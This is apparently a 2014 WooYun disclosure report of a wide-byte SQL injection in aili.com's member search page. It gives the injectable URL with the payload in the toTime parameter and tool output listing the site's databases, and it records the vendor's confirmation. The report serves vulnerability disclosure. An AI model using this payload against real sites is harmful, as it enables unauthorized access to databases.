当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061441

漏洞标题:爱丽网严重宽字节注射整站裤子可被扒~~

相关厂商:aili.com

漏洞作者: 卡卡

提交时间:2014-05-22 11:29

修复时间:2014-07-06 11:29

公开时间:2014-07-06 11:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-22: 细节已通知厂商并且等待厂商处理中
2014-05-22: 厂商已经确认,细节仅向厂商公开
2014-06-01: 细节向核心白帽子及相关领域专家公开
2014-06-11: 细节向普通白帽子公开
2014-06-21: 细节向实习白帽子公开
2014-07-06: 细节向公众公开

简要描述:

和高中同学聚会。蛮嗨皮的,饭后有人提议去k歌,但我高中前女友说他不想去了累。要去酒店休息,让我送她。尼玛的,我要k歌啊,于是,我打车把她送到酒店门口,我也没有下车,接着就回k歌的地方了,我心想,没有比同学聚会k歌喝酒开心的事情了。还好我机智,不然又耽误我K歌了~

详细说明:

漏洞网址:

http://member.aili.com


注射链接:

http://member.aili.com/index.php?a=search&c=content&channel=&fromTime=1&m=arc&title=Mr.&toTime=&type=arc


toTime参数这里,利用双字节便可绕过进行注射

http://member.aili.com/index.php?a=search&c=content&channel=&fromTime=1&m=arc&title=Mr.&toTime=%d5%27%d5%22&type=arc


.png


也懒得手工了~~丢工具了

sql注射.png


库:

available databases [3]:
[*] information_schema
[*] newcms
[*] test


由于是盲注,而且表太多,就不继续了

.png


如果继续下去,整站的内裤就不保了~~
我可绝对没脱裤子哦~
说好的礼物呢?
上次的都还没给我呢
赶快修复吧!

漏洞证明:

http://member.aili.com/index.php?a=search&c=content&channel=&fromTime=1&m=arc&title=Mr.&toTime=%d5%27%d5%22&type=arc


.png


也懒得手工了~~丢工具了

sql注射.png


库:

available databases [3]:
[*] information_schema
[*] newcms
[*] test


.png


修复方案:

你们懂的~

版权声明:转载请注明来源 卡卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-05-22 11:49

厂商回复:

亲,第一份礼物现在在路上,请耐心等待,第二份已经打包好

最新状态:

暂无


漏洞评价:

评论